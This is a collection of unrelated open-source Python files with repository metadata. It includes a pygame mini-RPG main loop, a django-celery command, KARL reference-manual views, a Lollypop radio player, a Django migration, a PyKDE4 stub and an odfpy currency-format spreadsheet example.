PygView.hitpointsfull = hitpointsfull
self.grid = 50
self.gridmaxx=13
self.gridmaxy=8
self.screen = pygame.display.set_mode((self.width, self.height), pygame.DOUBLEBUF)
self.background = pygame.Surface(self.screen.get_size()).convert()
self.background.fill((255,255,255)) # fill background white
self.clock = pygame.time.Clock()
self.fps = fps
self.playtime = 0.0
self.font = pygame.font.SysFont('mono', 24, bold=True)
self.folder="data"
self.tiles = {}
for x in range(self.grid // 2, self.width, self.grid):
for y in range(self.grid // 2, self.height, self.grid):
self.tiles[(x, y)] = True
self.tiles[(self.grid//2 + 10*self.grid, self.grid//2 + 1*self.grid)] = False
self.tiles[(self.grid//2 + 10*self.grid, self.grid//2 + 2*self.grid)] = False
self.room = 0 # entspricht index von self.backgrounds
try: # ------- load sound -------
self.crysound = pygame.mixer.Sound(os.path.join(self.folder,'claws.ogg')) #load sound
self.warpsound = pygame.mixer.Sound(os.path.join(self.folder,'wormhole.ogg'))
self.bombsound = pygame.mixer.Sound(os.path.join(self.folder,'bomb.ogg'))
self.lasersound = pygame.mixer.Sound(os.path.join(self.folder,'shoot.ogg'))
self.hitsound = pygame.mixer.Sound(os.path.join(self.folder,'beep.ogg'))
except:
print("could not load one of the sound files from folder %s. no sound, sorry" %folder)
#-----------------define sprite groups------------------------
#birdgroup = pygame.sprite.Group()
#bulletgroup = pygame.sprite.Group()
self.drawgroup = pygame.sprite.LayeredUpdates()
self.fragmentgroup = pygame.sprite.Group()
#self.gravitygroup = pygame.sprite.Group()
self.bulletgroup = pygame.sprite.Group()
self.snowmangroup = pygame.sprite.Group()
self.dogegroup = pygame.sprite.Group()
self.bargroup = pygame.sprite.Group()
self.enemygroup = pygame.sprite.Group()
self.playergroup = pygame.sprite.Group()
self.doenergroup = pygame.sprite.Group()
self.nonhostilegroup = pygame.sprite.Group()
# only the allgroup draws the sprite, so i use LayeredUpdates() instead Group()
self.allgroup = pygame.sprite.LayeredUpdates() # more sophisticated, can draw sprites in layers
PlayerSprite.groups=self.allgroup,self.playergroup, self.drawgroup
EvilSnowman.groups=self.allgroup,self.snowmangroup,self.enemygroup, self.drawgroup
EvilDoge.groups=self.allgroup,self.dogegroup,self.enemygroup, self.drawgroup
Doenertier.groups=self.allgroup,self.doenergroup,self.nonhostilegroup, self.drawgroup
Fragment.groups=self.allgroup,self.fragmentgroup, self.drawgroup
Bullet.groups=self.allgroup,self.bulletgroup, self.drawgroup
Lifebar.groups=self.allgroup,self.bargroup, self.drawgroup
#-------------loading files from data subdirectory -------------------------------
try: # load images into classes (class variable !). if not possible, draw ugly images
PlayerSprite.image.append(pygame.image.load(os.path.join(self.folder,"babytux.png")))
PlayerSprite.image.append(pygame.image.load(os.path.join(self.folder,"babytux_neg.png")))
self.bg1=pygame.image.load(os.path.join("data","background2.jpg"))
self.bg2=pygame.image.load(os.path.join("data","background.jpg"))
except:
print("no image files 'babytux.png' and 'babytux_neg.png' in subfolder %s" % folder)
print("therfore drawing incredibly ugly sprites instead")
self.silas=PlayerSprite(self.screen.get_rect(),imagenr=1)
PygView.ferris=PlayerSprite(self.screen.get_rect(),imagenr=0)
Lifebar(PygView.ferris)
self.backgrounds = [self.bg1, self.bg2]
self.background = self.bg1
def paint(self):
"""painting on the surface"""
self.background = self.backgrounds[self.room]
if self.room == 0:
#------- try out some pygame draw functions --------
# pygame.draw.rect(Surface, color, Rect, width=0): return Rect
pygame.draw.rect(self.background, (0,255,0), (50,50,100,25)) # rect: (x1, y1, width, height)
# pygame.draw.circle(Surface, color, pos, radius, width=0): return Rect
pygame.draw.circle(self.background, (0,200,0), (200,50), 35)
elif self.room == 1:
# pygame.draw.polygon(Surface, color, pointlist, width=0): return Rect
pygame.draw.polygon(self.background, (0,180,0), ((250,100),(300,0),(350,50)))
# pygame.draw.arc(Surface, color, Rect, start_angle, stop_angle, width=1): return Rect
pygame.draw.arc(self.background, (0,150,0),(400,10,150,100), 0, 3.14) # radiant instead of grad
# ------------------- make grid -------------
for x in range(0,self.width,self.grid):
pygame.draw.line(self.background, (0,255,35), (x,0),(x,self.height))
for y in range(0,self.height,self.grid):
pygame.draw.line(self.background, (0,255,35), (0,y),(self.width,y))
def tilecheck(self,x,y):
try:
result = self.tiles[(x,y)]
except:
return False
return result
def run(self):
"""The mainloop
"""
self.paint()
running = True
PygView.ferris.x=self.grid//2
PygView.ferris.y=self.grid//2
self.silas.x=self.grid*self.gridmaxx-self.grid//2
self.silas.y=self.grid*self.gridmaxy-self.grid//2
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
print("BYE")
running = False
# 0 key (resets movement)
if event.key == pygame.K_UP:
PygView.ferris.direction = "up"
if self.tilecheck(int(PygView.ferris.x),int(PygView.ferris.y)-self.grid):
#if self.tiles[(int(PygView.ferris.x), int(PygView.ferris.y)-self.grid)]:
PygView.ferris.up()
self.silas.x=PygView.ferris.oldx
self.silas.y=PygView.ferris.oldy
elif event.key == pygame.K_DOWN:
PygView.ferris.direction = "down"
if self.tilecheck(int(PygView.ferris.x), int(PygView.ferris.y)+self.grid):
#if self.tiles[(int(PygView.ferris.x), int(PygView.ferris.y)+self.grid)]:
PygView.ferris.down()
self.silas.x=PygView.ferris.oldx
self.silas.y=PygView.ferris.oldy
elif event.key == pygame.K_LEFT:
PygView.ferris.direction = "left"
if self.tilecheck(int(PygView.ferris.x)-self.grid, int(PygView.ferris.y)):
if self.background == self.bg2 and (PygView.ferris.x - self.grid ) <= self.grid//2:
self.room = 0
#self.background = self.bg1
self.paint()
PygView.ferris.x = self.grid * self.gridmaxx - self.grid//2
PygView.ferris.room = 0
else:
PygView.ferris.left()
self.silas.x=PygView.ferris.oldx
self.silas.y=PygView.ferris.oldy
elif event.key == pygame.K_RIGHT:
PygView.ferris.direction = "right"
#print(PygView.ferris.x, PygView.ferris.y, self.tiles.keys())
# tile right of ferris is allowed?
if self.tilecheck(int(PygView.ferris.x)+self.grid, int(PygView.ferris.y)):
#if self.tiles[(int(PygView.ferris.x)+self.grid, int(PygView.ferris.y))]:
if self.background == self.bg1 and PygView.ferris.x + self.grid >= self.grid * self.gridmaxx - self.grid//2:
#self.background = self.bg2
self.room = 1
self.paint()
PygView.ferris.x = 0
PygView.ferris.room = 1
else:
PygView.ferris.right()
self.silas.x=PygView.ferris.oldx
self.silas.y=PygView.ferris.oldy
if event.key == pygame.K_i:
self.silas.up()
if event.key == pygame.K_k:
self.silas.down()
if event.key == pygame.K_j:
self.silas.left()
if event.key == pygame.K_l:
self.silas.right()
if event.key == pygame.K_0:
self.silas.dx=0
self.silas.dy=0
self.silas.ddx=0
self.silas.ddy=0
# Teleportation
if event.key == pygame.K_f:
self.silas.x=(random.randint(0,640))
self.silas.y=(random.randint(0,640))
elif event.key == pygame.K_g:
Fragment(self.silas.x,self.silas.y, room=self.room)
elif event.key == pygame.K_v:
EvilSnowman(room=self.room)
elif event.key == pygame.K_b:
EvilDoge(room=self.room)
elif event.key == pygame.K_n:
Doenertier(room=self.room)
elif event.key == pygame.K_x:
for wave in range(4):
Doenertier(room=self.room)
EvilDoge(room=self.room)
EvilDoge(room=self.room)
EvilSnowman(room=self.room)
#fire bullets
if event.key == pygame.K_SPACE:
Bullet(PygView.ferris,PygView.ferris.direction, room=self.room)
keys=pygame.key.get_pressed()
milliseconds = self.clock.tick(self.fps)
seconds = milliseconds / 1000.0 # seconds passed since last frame
self.playtime += milliseconds / 1000.0
#self.draw_text("FPS: {:6.3}{}PLAYTIME: {:6.3} SECONDS".format(
# self.clock.get_fps(), " "*5, self.playtime))
# ----------- clear, draw , update, flip -----------------
#------------collision detection--------------------------
for p in self.playergroup:
crashgroup = pygame.sprite.spritecollide(p, self.bulletgroup, False, pygame.sprite.collide_rect)
for bu in crashgroup:
if bu.boss == p:
continue
p.hitpoints-=7
bu.kill()
if self.ferris.hitpoints < 1:
break
for p in self.playergroup: #detects when you take a bite off the delicous dönertier
crashgroup = pygame.sprite.spritecollide(p, self.doenergroup, False, pygame.sprite.collide_rect)
for do in crashgroup:
p.hitpoints += 7.0
do.hitpoints -= 3.0
for e in self.enemygroup:
crashgroup = pygame.sprite.spritecollide(e, self.bulletgroup, False, pygame.sprite.collide_rect)
for bu in crashgroup:
if bu.boss == e:
continue
e.hitpoints-=7
bu.kill()
# ferrris screenwechsel
if self.background == self.bg1 and PygView.ferris.x > self.width * 0.9 and PygView.ferris.dx > 0:
#self.background = self.bg2
self.room = 1
self.paint()
PygView.ferris.x = self.grid // 2
PygView.ferris.room = 1
if self.background == self.bg2 and PygView.ferris.x < self.width * 0.1 and PygView.ferris.dx < 0:
#self.background = self.bg1
self.room = 0
self.paint()
PygView.ferris.x = self.width // self.grid * self.grid - self.grid//2
PygView.ferris.room = 0
#self.allgroup.clear(self.screen, self.background)
self.allgroup.update(seconds)
#self.allgroup.draw(self.screen)
self.drawgroup = self.allgroup.copy()
for s in self.drawgroup:
if s.room != self.room:
self.drawgroup.remove(s)
self.drawgroup.draw(self.screen)
pygame.display.flip()
self.screen.blit(self.background, (0, 0))
#sys.exit()
#pygame.quit()
return
####
if __name__ == '__main__':
# call with width of window and fps
for line in showkeys():
print(line)
#i=raw_input("press enter")
PygView().run()
|
paolo-perfahl/mini_rpg
|
minirpg001.py
|
Python
|
gpl-2.0
| 40,408
|
from __future__ import absolute_import, unicode_literals
from celery.bin import celery
from djcelery.app import app
from djcelery.management.base import CeleryCommand
base = celery.CeleryCommand(app=app)
class Command(CeleryCommand):
"""The celery command."""
help = 'celery commands, see celery help'
requires_model_validation = True
options = (CeleryCommand.options
+ base.get_options()
+ base.preload_options)
def run_from_argv(self, argv):
argv = self.handle_default_options(argv)
if self.requires_model_validation:
self.validate()
base.execute_from_commandline(
['{0[0]} {0[1]}'.format(argv)] + argv[2:],
)
|
HiveHQ/django-celery
|
djcelery/management/commands/celery.py
|
Python
|
bsd-3-clause
| 724
|
# Copyright (C) 2008-2009 Open Society Institute
# Thomas Moroz: tmoroz@sorosny.org
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License Version 2 as published
# by the Free Software Foundation. You may not use, modify or distribute
# this program under any other version of the GNU General Public License.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from formencode import Invalid
from formencode import validators
from webob.exc import HTTPFound
from zope.component import getMultiAdapter
from zope.component import queryMultiAdapter
from zope.component.event import objectEventNotify
from repoze.bfg.chameleon_zpt import render_template
from repoze.bfg.chameleon_zpt import render_template_to_response
from repoze.bfg.security import authenticated_userid
from repoze.bfg.security import has_permission
from repoze.bfg.url import model_url
from repoze.enformed import FormSchema
from repoze.lemonade.content import create_content
from karl.events import ObjectModifiedEvent
from karl.events import ObjectWillBeModifiedEvent
from karl.views import baseforms
from karl.views.api import TemplateAPI
from karl.views.form import render_form_to_response
from karl.views.tags import set_tags
from karl.views.utils import convert_to_script
from karl.views.tags import get_tags_client_data
from karl.views.utils import make_unique_name
from karl.content.interfaces import ICommunityFile
from karl.content.interfaces import IPage
from karl.content.interfaces import IReferenceManual
from karl.content.interfaces import IReferenceSection
from karl.content.views.interfaces import IFileInfo
from karl.content.views.utils import get_previous_next
from karl.utils import get_folder_addables
from karl.utils import get_layout_provider
def add_referencemanual_view(context, request):
tags_list=request.POST.getall('tags')
form = AddReferenceManualForm(tags_list=tags_list)
if 'form.cancel' in request.POST:
return HTTPFound(location=model_url(context, request))
if 'form.submitted' in request.POST:
try:
converted = form.validate(request.POST)
# Create the reference manual and store it
creator = authenticated_userid(request)
reference_manual = create_content(IReferenceManual,
converted['title'],
converted['description'],
creator,
)
name = make_unique_name(context, converted['title'])
context[name] = reference_manual
# Save the tags on it.
set_tags(reference_manual, request, converted['tags'])
location = model_url(reference_manual, request)
return HTTPFound(location=location)
except Invalid, e:
fielderrors = e.error_dict
fill_values = form.convert(request.POST)
tags_field = dict(
records = [dict(tag=t) for t in request.POST.getall('tags')]
)
else:
fielderrors = {}
fill_values = {}
tags_field = dict(records=[])
# Render the form and shove some default values in
page_title = 'Add Reference Manual'
api = TemplateAPI(context, request, page_title)
# Get a layout
layout_provider = get_layout_provider(context, request)
layout = layout_provider('intranet')
return render_form_to_response(
'templates/addedit_referencemanual.pt',
form,
fill_values,
post_url=request.url,
formfields=api.formfields,
fielderrors=fielderrors,
api=api,
head_data=convert_to_script(dict(
tags_field = tags_field,
)),
layout=layout,
)
def _get_toc(context, here_url):
"""Get the nested data used by ZPT for showing the refman TOC"""
section_up = here_url + '?sectionUp=%s'
section_down = here_url + '?sectionDown=%s'
item_up = here_url + '?section=%s&itemUp=%s'
item_down = here_url + '?section=%s&itemDown=%s'
# First, be a chicken and sync
context.ordering.sync(context.keys())
# Iterate over each section using the ordering for the order of
# __name__'s
sections = []
for section_name in context.ordering.items():
# Get the data about this section
section = context.get(section_name)
section.ordering.sync(section.keys())
item = {
'name': section_name,
'title': section.title,
'moveUp': section_up % section_name,
'moveDown': section_down % section_name,
'href': here_url + section_name,
'items': [],
}
# Now append data about each section's items, again using the
# ordering
for subitem_name in section.ordering.items():
subitem = section.get(subitem_name)
item['items'].append({
'name': subitem_name,
'title': subitem.title,
'href': here_url + section_name + '/' + subitem_name,
'moveUp': item_up % (section_name, subitem_name),
'moveDown': item_down % (section_name, subitem_name),
})
sections.append(item)
return sections
def _get_viewall(context, request, api):
"""Get the nested data used by ZPT for showing the refman TOC"""
# First, be a chicken and sync
context.ordering.sync(context.keys())
# Iterate over each section using the ordering for the order of
# __name__'s
sections = []
for section_name in context.ordering.items():
# Get the data about this section
section = context.get(section_name)
section.ordering.sync(section.keys())
item = {
'name': section_name,
'title': section.title,
'html': '<p>%s</p>' % section.description,
'items': [],
}
# Now append data about each section's items, again using the
# ordering
for subitem_name in section.ordering.items():
subitem = section.get(subitem_name)
# If this is a page, we generate one chunk of HTML, if
# File, a different
if IPage.providedBy(subitem):
html = subitem.text
elif ICommunityFile.providedBy(subitem):
fileinfo = getMultiAdapter((subitem, request), IFileInfo)
html = render_template(
'templates/inline_file.pt',
api=api,
fileinfo=fileinfo,
)
else:
html = '<p>Unknown type</p>'
item['items'].append({
'name': subitem_name,
'title': subitem.title,
'html': html,
})
sections.append(item)
return sections
def show_referencemanual_view(context, request):
# Look for moveUp or moveDown in QUERY_STRING, telling us to
# reorder something
status_message = None
sectionUp = request.params.get('sectionUp', False)
if sectionUp:
section = context.get(sectionUp)
context.ordering.moveUp(sectionUp)
status_message = 'Moved section <em>%s</em> up' % section.title
else:
sectionDown = request.params.get('sectionDown', False)
if sectionDown:
section = context.get(sectionDown)
context.ordering.moveDown(sectionDown)
status_message = 'Moved section <em>%s</em> down' % section.title
else:
itemUp = request.params.get('itemUp', False)
if itemUp:
section = context.get(request.params.get('section'))
section.ordering.moveUp(itemUp)
title = section.get(itemUp).title
status_message = 'Moved item <em>%s</em> up' % title
else:
itemDown = request.params.get('itemDown', False)
if itemDown:
section = context.get(request.params.get('section'))
section.ordering.moveDown(itemDown)
title = section.get(itemDown).title
status_message = 'Moved item <em>%s</em> down' % title
backto = {
'href': model_url(context.__parent__, request),
'title': context.__parent__.title,
}
actions = []
if has_permission('create', context, request):
addables = get_folder_addables(context, request)
if addables is not None:
actions.extend(addables())
actions.append(('Edit', 'edit.html'))
if has_permission('delete', context, request):
actions.append(('Delete', 'delete.html'))
page_title = context.title
api = TemplateAPI(context, request, page_title)
# Get a layout
layout_provider = get_layout_provider(context, request)
layout = layout_provider('intranet')
# provide client data for rendering current tags in the tagbox
client_json_data = dict(
tagbox = get_tags_client_data(context, request),
)
api.status_message = status_message
return render_template_to_response(
'templates/show_referencemanual.pt',
api=api,
actions=actions,
head_data=convert_to_script(client_json_data),
sections=_get_toc(context, api.here_url),
backto=backto,
layout=layout,
)
def viewall_referencemanual_view(context, request):
backto = {
'href': model_url(context.__parent__, request),
'title': context.__parent__.title,
}
page_title = context.title
api = TemplateAPI(context, request, page_title)
# Get a layout
layout_provider = get_layout_provider(context, request)
layout = layout_provider('intranet')
# provide client data for rendering current tags in the tagbox
client_json_data = dict(
tagbox = get_tags_client_data(context, request),
)
return render_template_to_response(
'templates/viewall_referencemanual.pt',
api=api,
actions=[],
head_data=convert_to_script(client_json_data),
sections=_get_viewall(context, request, api),
backto=backto,
layout=layout,
)
def edit_referencemanual_view(context, request):
tags_list = request.POST.getall('tags')
form = EditReferenceManualForm(tags_list=tags_list)
if 'form.cancel' in request.POST:
return HTTPFound(location=model_url(context, request))
if 'form.submitted' in request.POST:
try:
converted = form.validate(request.POST)
# *will be* modified event
objectEventNotify(ObjectWillBeModifiedEvent(context))
context.title = converted['title']
context.description = converted['description']
# Save the tags on it
set_tags(context, request, converted['tags'])
# Modified
context.modified_by = authenticated_userid(request)
objectEventNotify(ObjectModifiedEvent(context))
location = model_url(context, request)
msg = "?status_message=Reference%20manual%20edited"
return HTTPFound(location=location+msg)
except Invalid, e:
fielderrors = e.error_dict
fill_values = form.convert(request.POST)
else:
fielderrors = {}
fill_values = dict(
title = context.title,
description = context.description,
)
# prepare client data
client_json_data = dict(
tags_field = get_tags_client_data(context, request),
)
# Render the form and shove some default values in
page_title = 'Edit ' + context.title
api = TemplateAPI(context, request, page_title)
# Get a layout
layout_provider = get_layout_provider(context, request)
layout = layout_provider('intranet')
return render_form_to_response(
'templates/addedit_referencemanual.pt',
form,
fill_values,
post_url=request.url,
formfields=api.formfields,
fielderrors=fielderrors,
api=api,
head_data=convert_to_script(client_json_data),
layout=layout,
)
def add_referencesection_view(context, request):
tags_list=request.POST.getall('tags')
form = AddReferenceSectionForm(tags_list = tags_list)
if 'form.cancel' in request.POST:
return HTTPFound(location=model_url(context, request))
if 'form.submitted' in request.POST:
try:
converted = form.validate(request.POST)
# Be a chicken and sync the ordering every time before
# adding something, just to make sure nothing gets lost.
context.ordering.sync(context.keys())
# Create the reference section and store it
creator = authenticated_userid(request)
reference_section = create_content(IReferenceSection,
converted['title'],
converted['description'],
creator,
)
name = make_unique_name(context, converted['title'])
context[name] = reference_section
# Save the tags on it.
set_tags(reference_section, request, converted['tags'])
# Update the ordering
context.ordering.add(name)
location = model_url(reference_section, request)
return HTTPFound(location=location)
except Invalid, e:
fielderrors = e.error_dict
fill_values = form.convert(request.POST)
tags_field = dict(
records = [dict(tag=t) for t in request.POST.getall('tags')]
)
else:
fielderrors = {}
fill_values = {}
tags_field = dict(records=[])
# Render the form and shove some default values in
page_title = 'Add Reference Section'
api = TemplateAPI(context, request, page_title)
# Get a layout
layout_provider = get_layout_provider(context, request)
layout = layout_provider('intranet')
return render_form_to_response(
'templates/addedit_referencesection.pt',
form,
fill_values,
post_url=request.url,
formfields=api.formfields,
fielderrors=fielderrors,
api=api,
head_data=convert_to_script(dict(
tags_field = tags_field,
)),
layout=layout,
)
def _get_ordered_listing(context, request):
# First, be a chicken and sync
context.ordering.sync(context.keys())
# Flatten the list
entries = []
for name in context.ordering.items():
child = context.get(name, False)
entries.append({
'title': child.title,
'href': model_url(child, request),
})
return entries
def show_referencesection_view(context, request):
backto = {
'href': model_url(context.__parent__, request),
'title': context.__parent__.title,
}
actions = []
if has_permission('create', context, request):
addables = get_folder_addables(context, request)
if addables is not None:
actions.extend(addables())
actions.append(('Edit', 'edit.html'))
if has_permission('delete', context, request):
actions.append(('Delete', 'delete.html'))
page_title = context.title
api = TemplateAPI(context, request, page_title)
# Get a layout
layout_provider = get_layout_provider(context, request)
layout = layout_provider('intranet')
previous, next = get_previous_next(context, request)
# provide client data for rendering current tags in the tagbox
client_json_data = dict(
tagbox = get_tags_client_data(context, request),
)
return render_template_to_response(
'templates/show_referencesection.pt',
api=api,
actions=actions,
entries=_get_ordered_listing(context, request),
head_data=convert_to_script(client_json_data),
backto=backto,
previous=previous,
next=next,
layout=layout,
)
def edit_referencesection_view(context, request):
tags_list = request.POST.getall('tags')
form = EditReferenceSectionForm(tags_list=tags_list)
if 'form.cancel' in request.POST:
return HTTPFound(location=model_url(context, request))
if 'form.submitted' in request.POST:
try:
converted = form.validate(request.POST)
# *will be* modified event
objectEventNotify(ObjectWillBeModifiedEvent(context))
context.title = converted['title']
context.description = converted['description']
# Save the tags on it
set_tags(context, request, converted['tags'])
# Modified
context.modified_by = authenticated_userid(request)
objectEventNotify(ObjectModifiedEvent(context))
location = model_url(context, request)
msg = "?status_message=Reference%20section%20edited"
return HTTPFound(location=location+msg)
except Invalid, e:
fielderrors = e.error_dict
fill_values = form.convert(request.POST)
else:
fielderrors = {}
fill_values = dict(
title = context.title,
description = context.description,
)
# prepare client data
client_json_data = dict(
tags_field = get_tags_client_data(context, request),
)
# Render the form and shove some default values in
page_title = 'Edit ' + context.title
api = TemplateAPI(context, request, page_title)
# Get a layout
layout_provider = get_layout_provider(context, request)
layout = layout_provider('intranet')
return render_form_to_response(
'templates/addedit_referencesection.pt',
form,
fill_values,
post_url=request.url,
formfields=api.formfields,
fielderrors=fielderrors,
api=api,
head_data=convert_to_script(client_json_data),
layout=layout,
)
class AddReferenceManualForm(FormSchema):
title = baseforms.title
tags = baseforms.tags
description = validators.UnicodeString(strip=True)
class EditReferenceManualForm(FormSchema):
title = baseforms.title
tags = baseforms.tags
description = validators.UnicodeString(strip=True)
class AddReferenceSectionForm(FormSchema):
title = baseforms.title
tags = baseforms.tags
description = validators.UnicodeString(strip=True)
class EditReferenceSectionForm(FormSchema):
title = baseforms.title
tags = baseforms.tags
description = validators.UnicodeString(strip=True)
|
boothead/karl
|
karl/content/views/references.py
|
Python
|
gpl-2.0
| 19,434
|
# Copyright (c) 2014-2016 Cedric Bellegarde <cedric.bellegarde@adishatz.org>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import TotemPlParser, Gst
from lollypop.radios import Radios
from lollypop.player_base import BasePlayer
from lollypop.define import Type
from lollypop.objects import Track
from lollypop.utils import get_network_available
class RadioPlayer(BasePlayer):
"""
Radio player
This class neeed the parent object to be a BinPlayer
We keep a version of available radios (set_radios()) because we
need to be in sync with current/last view and not with db (popularity
changes)
"""
def __init__(self):
"""
Init radio player
"""
BasePlayer.__init__(self)
self.__current = None
self.__radios = []
def load(self, track):
"""
Load radio at uri
@param track as Track
"""
if get_network_available():
try:
self.__current = track
parser = TotemPlParser.Parser.new()
parser.connect("entry-parsed", self.__on_entry_parsed, track)
parser.parse_async(track.uri, True,
None, self.__on_parse_finished, track)
except Exception as e:
print("RadioPlayer::load(): ", e)
if self.is_party:
self.set_party(False)
self._next_track = Track()
self.emit('next-changed')
def next(self):
"""
Return next radio name, uri
@return Track
"""
track = Track()
if self._current_track.id != Type.RADIOS or not self.__radios:
return track
i = 0
for (name, url) in self.__radios:
i += 1
if self._current_track.album_artists[0] == name:
break
# Get next radio
if i >= len(self.__radios):
i = 0
name = self.__radios[i][0]
url = self.__radios[i][1]
if url:
track.set_radio(name, url)
return track
def prev(self):
"""
Return prev radio name, uri
@return Track
"""
track = Track()
if self._current_track.id != Type.RADIOS or not self.__radios:
return track
i = len(self.__radios) - 1
for (name, url) in reversed(self.__radios):
i -= 1
if self._current_track.album_artists[0] == name:
break
# Get prev radio
if i < 0:
i = len(self.__radios) - 1
name = self.__radios[i][0]
url = self.__radios[i][1]
if url:
track.set_radio(name, url)
return track
def set_radios(self, radios):
"""
Set available radios
@param radios as (name, url)
"""
self.__radios = radios
#######################
# PRIVATE #
#######################
def __start_playback(self, track):
"""
Start playing track
@param track as Track:
"""
self._plugins.volume.props.volume = 1.0
self._playbin.set_state(Gst.State.NULL)
self._playbin.set_property('uri', track.uri)
Radios().set_more_popular(track.album_artists[0])
self._current_track = track
self.__current = None
self._playbin.set_state(Gst.State.PLAYING)
if not self.__radios:
self.__radios = Radios().get()
self.emit('status-changed')
def __on_parse_finished(self, parser, result, track):
"""
Sometimes, TotemPlparse fails to add
the playlist URI to the end of the playlist on parse failure
So, do the job here
@param parser as TotemPlParser.Parser
@param result as Gio.AsyncResult
@param track as Track
"""
# Only start playing if context always True
if self.__current == track:
self.__start_playback(track)
def __on_entry_parsed(self, parser, uri, metadata, track):
"""
Play stream
@param parser as TotemPlParser.Parser
@param track uri as str
@param metadata as GLib.HastTable
@param track as Track
"""
# Only start playing if context always True
if self.__current == track:
track.set_radio(track.album_artists[0], uri)
self.__start_playback(track)
|
kerimlcr/ab2017-dpyo
|
ornek/lollypop/lollypop-0.9.229/src/player_radio.py
|
Python
|
gpl-3.0
| 5,135
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('demo_models', '0002_bar_foos'),
]
operations = [
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
('name', models.CharField(max_length=50)),
('address', models.CharField(max_length=80)),
],
),
migrations.CreateModel(
name='Waiter',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Restaurant',
fields=[
('place', models.OneToOneField(primary_key=True, to='demo_models.Place', serialize=False)),
('serves_hot_dogs', models.BooleanField(default=False)),
('serves_pizza', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='waiter',
name='restaurant',
field=models.ForeignKey(to='demo_models.Restaurant'),
),
]
|
AbhiAgarwal/django-report-builder
|
report_builder_demo/demo_models/migrations/0003_auto_20150419_2110.py
|
Python
|
bsd-3-clause
| 1,395
|
# encoding: utf-8
# module PyKDE4.kio
# from /usr/lib/python3/dist-packages/PyKDE4/kio.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc
# imports
import PyKDE4.kdeui as __PyKDE4_kdeui
import PyQt4.QtCore as __PyQt4_QtCore
import PyQt4.QtGui as __PyQt4_QtGui
class KMimeTypeChooserDialog(__PyKDE4_kdeui.KDialog):
# no doc
def chooser(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247971765/PyKDE4/kio/KMimeTypeChooserDialog.py
|
Python
|
gpl-2.0
| 501
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009 Brad Ralph, Sydney, Australia
#
# This is free software. You may redistribute it under the terms
# of the Apache license and the GNU General Public License Version
# 2 or at your option any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
# Søren Roug
# This example shows how to do a conditional currency style. We want negative
# numbers to show as red and as Australian dollars.
from odf.opendocument import OpenDocumentSpreadsheet
from odf.style import Style, TextProperties, TableColumnProperties, Map
from odf.number import NumberStyle, CurrencyStyle, CurrencySymbol, Number, Text
from odf.text import P
from odf.table import Table, TableColumn, TableRow, TableCell
textdoc = OpenDocumentSpreadsheet()
# Create a style for the table content. One we can modify
# later in the spreadsheet.
tablecontents = Style(name="Large number", family="table-cell")
tablecontents.addElement(TextProperties(fontfamily="Arial", fontsize="15pt"))
textdoc.styles.addElement(tablecontents)
# Create automatic styles for the column widths.
widewidth = Style(name="co1", family="table-column")
widewidth.addElement(TableColumnProperties(columnwidth="2.8cm", breakbefore="auto"))
textdoc.automaticstyles.addElement(widewidth)
# Create the styles for $AUD format currency values
ns1 = CurrencyStyle(name="positive-AUD", volatile="true")
ns1.addElement(CurrencySymbol(language="en", country="AU", text=u"$"))
ns1.addElement(Number(decimalplaces="2", minintegerdigits="1", grouping="true"))
textdoc.styles.addElement(ns1)
# Create the main style.
ns2 = CurrencyStyle(name="main-AUD")
ns2.addElement(TextProperties(color="#ff0000"))
ns2.addElement(Text(text=u"-"))
ns2.addElement(CurrencySymbol(language="en", country="AU", text=u"$"))
ns2.addElement(Number(decimalplaces="2", minintegerdigits="1", grouping="true"))
ns2.addElement(Map(condition="value()>=0", applystylename="positive-AUD"))
textdoc.styles.addElement(ns2)
# Create automatic style for the price cells.
moneycontents = Style(name="ce1", family="table-cell", parentstylename=tablecontents, datastylename="main-AUD")
textdoc.automaticstyles.addElement(moneycontents)
# Start the table, and describe the columns
table = Table(name="Currency colours")
# Create a column (same as <col> in HTML) Make all cells in column default to currency
table.addElement(TableColumn(stylename=widewidth, defaultcellstylename="ce1"))
# Create a row (same as <tr> in HTML)
tr = TableRow()
table.addElement(tr)
# Create a cell with a negative value. It should show as red.
cell = TableCell(valuetype="currency", currency="AUD", value="-125")
cell.addElement(P(text=u"$-125.00")) # The current displayed value
tr.addElement(cell)
# Create a row (same as <tr> in HTML)
tr = TableRow()
table.addElement(tr)
# Create another cell but with a positive value. It should show in black
cell = TableCell(valuetype="currency", currency="AUD", value="123")
cell.addElement(P(text=u"$123.00")) # The current displayed value
tr.addElement(cell)
textdoc.spreadsheet.addElement(table)
textdoc.save("currency.ods")
|
